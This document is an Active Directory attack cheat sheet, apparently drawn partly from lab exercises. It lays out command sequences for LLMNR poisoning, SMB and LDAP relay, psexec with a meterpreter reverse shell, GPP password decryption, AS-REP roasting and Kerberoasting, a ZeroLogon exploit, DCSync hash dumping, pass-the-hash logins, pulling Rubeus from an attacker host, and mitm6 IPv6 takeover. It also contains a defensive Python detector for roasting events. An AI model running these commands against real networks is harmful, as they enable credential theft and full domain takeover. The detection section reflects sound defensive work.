Active Directory
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
LLMNR Poisoning
LLMNR is like DNS on an internal Windows network. Listen for name lookups of mistyped or nonexistent network drives and capture the NTLMv2 hashes that follow.
(Impacket toolkit required)
responder -I tun0 -rdwv
Have the machine access a share
\\badservername\share\file
http://school.flight.htb/index.php?view=//10.10.14.6/share/poc.txt
Password cracking with hashcat (NTLMv2)
hashcat -m 5600 hash.txt rockyou.txt --force
Additional reading:
https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html
SMB Relay
Relay the captured hashes to gain access to specific machines. The relayed user must be a local admin on the target machine.
Check whether SMB signing is not required (nmap reports "Message signing enabled but not required"):
nmap --script=smb2-security-mode.nse -p445 192.168.57.0
Save relevant hosts to targets.txt
Disable the SMB and HTTP servers in Responder.conf:
nano /etc/responder/Responder.conf
Start listening for events on responder
python responder.py -I eth0 -rdwv
Initialize relay
ntlmrelayx.py -tf targets.txt -smb2support
Retrieve SAM hashes
Using SAM hashes with psexec
msfconsole
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhosts
set smbdomain MARVEL.local
set smbuser
set smbpassword # you can also use the NTLM hash
run
psexec.py MARVEL/user:'Password'@192.168.1.2
psexec.py administrator@192.168.1.2 -hashes aaf8dbueaihf3budia:dwafbuubde7vey2
Abusing Group Policy Preferences (GPP)
Find the Groups.xml file.
\\DOMAIN\SYSVOL\domain\Policies\RANDOMOBJECTS\Machine\Preferences\Groups\Groups.xml
or
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
Retrieve the cpassword hash and decrypt it:
gpp-decrypt hash
You can use the credentials with psexec.py, or try Kerberoasting.
Kerberos (AS-REP Roasting)
Run Impacket's GetNPUsers.py to find users that do not require Kerberos pre-authentication:
GetNPUsers.py -dc-ip IP -no-pass -userfile user.txt
or, with no credentials:
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
Crack the hashes found
Use evil-winrm to connect to the box using the credentials found
./evil-winrm.rb -u USER -p PASSWORD -i IPADDR
Use ntlmrelayx.py from Impacket to relay the incoming authentication to LDAP:
ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Authenticate by visiting http://localhost/privexchange (any directory will work, this one is arbitrary). This sets the user as Domain Admin.
Abusing ZeroLogon
python3 zerologon_check.py DC IP
python3 cve-2020-1472-exploit.py DC IP
Use Impacket’s secretsdump.py to perform the DCSync attack, gathering all the user hashes:
secretsdump.py -just-dc DOMAIN/DC\$@IP
secretsdump.py htb.local/user:password@10.10.10.161 -just-dc -outputfile secrets-dump.txt
Log in using the Administrator hash:
evil-winrm -u Administrator -i 10.10.10.161 -H '32693b11e6aa90eb43d32c72a07ceea6'
To retrieve the machine account's original password (as hex) and restore it:
secretsdump.py administrator@IP -hashes HASH
python3 restorepassword.py DOMAIN/DC@DC_HOSTNAME -target-ip IP -hexpass HEXPASS
Kerbrute
Kerbrute is a popular enumeration tool used to brute-force and enumerate valid Active Directory users by abusing Kerberos pre-authentication.
You need to add the DNS domain name along with the machine IP to /etc/hosts on your attacking machine: 10.10.117.212 CONTROLLER.local
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt
Harvesting Tickets w/ Rubeus
On the target machine:
Rubeus.exe harvest /interval:30
Rubeus.exe kerberoast
This will dump the Kerberos hash of any kerberoastable users
Dumping KRBASREP5 Hashes w/ Rubeus
Rubeus.exe asreproast
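On the detection side of the AS-REP roasting and Rubeus kerberoast/asreproast steps above, this added example (not part of the original notes) flags the two patterns in domain controller Kerberos events: a 4768 with pre-authentication disabled and an RC4 ticket, and 4769 RC4 service tickets for non-machine SPNs, with a per-source burst count. The key=value log format and the sample events are constructed; the field names follow the 4768/4769 event attributes.

```python
from collections import Counter

RC4_HMAC = "0x17"   # etype 23, the only type the roasting cracking modes consume
NO_PREAUTH = "0"    # PreAuthType 0: "Do not require Kerberos preauthentication" set

def parse_line(line):
    """Parse one 'Key=Value Key=Value' event line into a dict (constructed export format)."""
    return dict(field.split("=", 1) for field in line.split())

def classify(ev):
    """Label an event as an AS-REP roast or Kerberoast indicator, else None."""
    eid, etype = ev.get("EventID"), ev.get("TicketEncryptionType")
    if eid == "4768" and ev.get("PreAuthType") == NO_PREAUTH and etype == RC4_HMAC:
        return "asrep-roast"
    svc = ev.get("ServiceName", "")
    # krbtgt and machine accounts (trailing $) are not what roasting goes after
    if eid == "4769" and etype == RC4_HMAC and svc.lower() != "krbtgt" and not svc.endswith("$"):
        return "kerberoast"
    return None

def detect(log_text, burst_threshold=3):
    """Return (findings, burst_ips): every matching event, plus client IPs that
    pulled >= burst_threshold RC4 service tickets, the typical one-shot Rubeus pattern."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        label = classify(ev)
        if label is None:
            continue
        findings.append((label, ev.get("TargetUserName"), ev.get("ServiceName", "-"), ev.get("IpAddress")))
        if label == "kerberoast":
            per_ip[ev.get("IpAddress")] += 1
    return findings, sorted(ip for ip, n in per_ip.items() if n >= burst_threshold)

# Constructed sample events modelled on 4768/4769 fields; not real log data.
SAMPLE_LOG = """\
EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.6
EventID=4768 TargetUserName=jdoe PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.25
EventID=4769 TargetUserName=jdoe ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.10.10.25
EventID=4769 TargetUserName=jdoe ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=10.10.10.25
EventID=4769 TargetUserName=jdoe ServiceName=svc-sql TicketEncryptionType=0x17 IpAddress=10.10.14.6
EventID=4769 TargetUserName=jdoe ServiceName=svc-web TicketEncryptionType=0x17 IpAddress=10.10.14.6
EventID=4769 TargetUserName=jdoe ServiceName=svc-backup TicketEncryptionType=0x17 IpAddress=10.10.14.6
EventID=4769 TargetUserName=bsmith ServiceName=legacy-app TicketEncryptionType=0x17 IpAddress=10.10.10.40
"""
```

A single RC4 service ticket (the bsmith line) is reported but not counted as a burst, since legacy services still legitimately use RC4; the threshold is where the tuning lives.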
DCSync w/ Rubeus
Upload Rubeus using a compiled binary from SharpCollection:
powershell wget 10.10.14.6/Rubeus.exe -outfile rubeus.exe
.\rubeus.exe tgtdeleg /nowrap
Configure Kerberos ticket
Decode the base64 ticket and save it as ticket.kirbi. Then kirbi2ccache will convert it to the format needed by my Linux system:
kirbi2ccache ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
Time Issues
It's really common when doing these kinds of attacks to run into clock-skew issues. Sync the clock with ntpdate:
sudo ntpdate -s flight.htb
Run secretsdump with the environment variable set above:
secretsdump.py -k -no-pass g0.flight.htb -just-dc-user administrator
Crack the resulting hashes
IPv6 DNS Takeover via mitm6
GitHub - fox-it/mitm6: pwning IPv4 via IPv6
mitm6 -d marvel.local
Set up the relay attack:
ntlmrelayx.py -6 -t ldaps://DCIPADDR -wh fakewpad.marvel.local -l lootme
Just run this for 5 or 10 minutes
The worst of both worlds: Combining NTLM Relaying and Kerberos delegation - dirkjanm.io
Pass-Back Attack
Hacking a printer and getting LDAP credentials through a Pass-Back Attack